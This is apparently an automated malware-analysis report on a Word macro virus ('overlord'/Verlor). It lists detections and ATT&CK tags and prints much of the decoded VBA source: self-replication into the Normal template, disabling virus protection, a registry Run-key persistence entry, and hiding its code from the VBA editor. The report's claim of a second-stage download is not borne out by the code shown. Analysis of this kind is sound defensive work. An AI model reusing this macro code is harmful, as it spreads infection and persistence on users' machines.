MALICIOUS
268
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1105 Ingress Tool Transfer
The sample contains legacy WordBasic and VBA macros, including an Auto_Close macro, indicating malicious intent. The Auto_Close macro attempts to disable virus protection and then exports its own code to 'tempad.dll' and 'tempnt.dll' in the Windows directory. It also attempts to establish persistence by writing to the registry key 'HKCU\software\microsoft\windows\CurrentVersion\run\Overlord' with a value of 'C:\Windows\overlord.vbs', suggesting it downloads and executes a second-stage payload.
Heuristics 6
-
ClamAV: Doc.Trojan.Verlor-4 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Verlor-4
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5146 bytes |
SHA-256: ee6be230de1c2202d1228627d11277f6796a166db81f321f434f857577240f55 |
|||
|
Detection
ClamAV:
Doc.Trojan.Verlor-4
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module"
Sub AutoClose()
'MyName = seNse [aka overlord.a]
'WrittenBy = f0re [UC/Skamwerks/DVC]
'Version = .A (1.2)
On Error Resume Next
windir = Environ("windir")
If Dir(windir & "\tempad.dll") <> "" Then Kill (windir & "\tempad.dll")
If Dir(windir & "\tempnt.dll") <> "" Then Kill (windir & "\tempnt.dll")
Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
If NormalTemplate.VBProject.VBComponents.Item("Module").CodeModule.Lines(3, 1) <> "'MyName = Overlord" Then
ActiveDocument.VBProject.VBComponents("Module").Export (windir & "\tempad.dll")
NormalTemplate.VBProject.VBComponents.import (windir & "\tempad.dll")
NormalTemplate.Save
End If
If ActiveDocument.VBProject.VBComponents.Item("Module").CodeModule.Lines(3, 1) <> "'MyName = Overlord" Then
NormalTemplate.VBProject.VBComponents("Module").Export (windir & "\tempnt.dll")
ActiveDocument.VBProject.VBComponents.import (windir & "\tempnt.dll")
ActiveDocument.SaveAs ActiveDocument.FullName
End If
End Sub
Sub Stealth()
On Error Resume Next
windir = Environ("windir")
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\software\", "RegisteredOwner") = "the Overlord"
System.PrivateProfileString("", "HKEY_CURRENT_USER\software\microsoft\windows\CurrentVersion\run", "Overlord") = windir & "\overlord.vbs"
If Dir(windir & "\overlord.a.vbs") <> "" Then Kill (windir & "\overlord.a.vbs")
If Dir(windir & "\overlord.a.dll") <> "" Then Kill (windir & "\overlord.a.dll")
Open "c:\windows\overlord.a.vbs" For Append As #1
Print #1, "On error resume next"
Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Print #1, "WordObj.Options.SaveNormalPrompt = False"
Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.remove WordObj.NormalTemplate.VBProject.VBComponents(" & Chr(34) & "Module" & Chr(34) & ")"
Print #1, "WordObj.NormalTemplate.save"
Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.import (" & Chr(34) & windir & "\overlord.a.dll" & Chr(34) & ")"
Print #1, "WordObj.NormalTemplate.save"
Print #1, "set NT = nothing"
Print #1, "WordObj.Quit"
Close #1
NormalTemplate.VBProject.VBComponents("Module").Export (windir & "\overlord.a.dll")
End Sub
Sub ViewVBCode()
On Error Resume Next
Call Stealth
For X = 1 To NormalTemplate.VBProject.VBComponents("Module").CodeModule.CountOfLines
Code = Code & NormalTemplate.VBProject.VBComponents("Module").CodeModule.Lines(X, 1) & Chr(13)
Next X
NormalTemplate.VBProject.VBComponents("Module").CodeModule.deletelines 1, NormalTemplate.VBProject.VBComponents("Module").CodeModule.CountOfLines
NormalTemplate.Saved = True
Docnumber = Application.Documents.Count
If Docnumber >= 1 Then
For X = 1 To Docnumber
Documents(X).VBProject.VBComponents("Module").CodeModule.deletelines 1, Documents(X).VBProject.VBComponents("Module").CodeModule.CountOfLines
Documents(X).Saved = True
Next X
End If
Application.ShowVisualBasicEditor = True
While Application.ShowVisualBasicEditor = True
DoEvents
Wend
NormalTemplate.VBProject.VBComponents("Module").CodeModule.InsertLines 1, Code
NormalTemplate.Save
Docnumber = Application.Documents.Count
If Docnumber >= 1 Then
For X = 1 To Docnumber
Documents(X).VBProject.VBComponents("Module").CodeModule.InsertLines 1, Code
Documents(X).SaveAs Documents(X).FullName
Next X
End If
End Sub
Sub ToolsMacro()
On Error Resume Next
For X = 1 To NormalTemplate.VBProject.VBComponents("Module").CodeModule.CountOfLines
codeNT = codeNT & NormalTemplate.VBProject.VBComponents("Module").CodeModule.Lines(X, 1) & Chr(13)
Next X
NormalTemplate.VBProject.VBComponents("Module").CodeModule.deletelines 1, NormalTemplate.VBProject.VBComponents("Module").CodeModule.CountOfLines
NormalTemplate.Saved
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.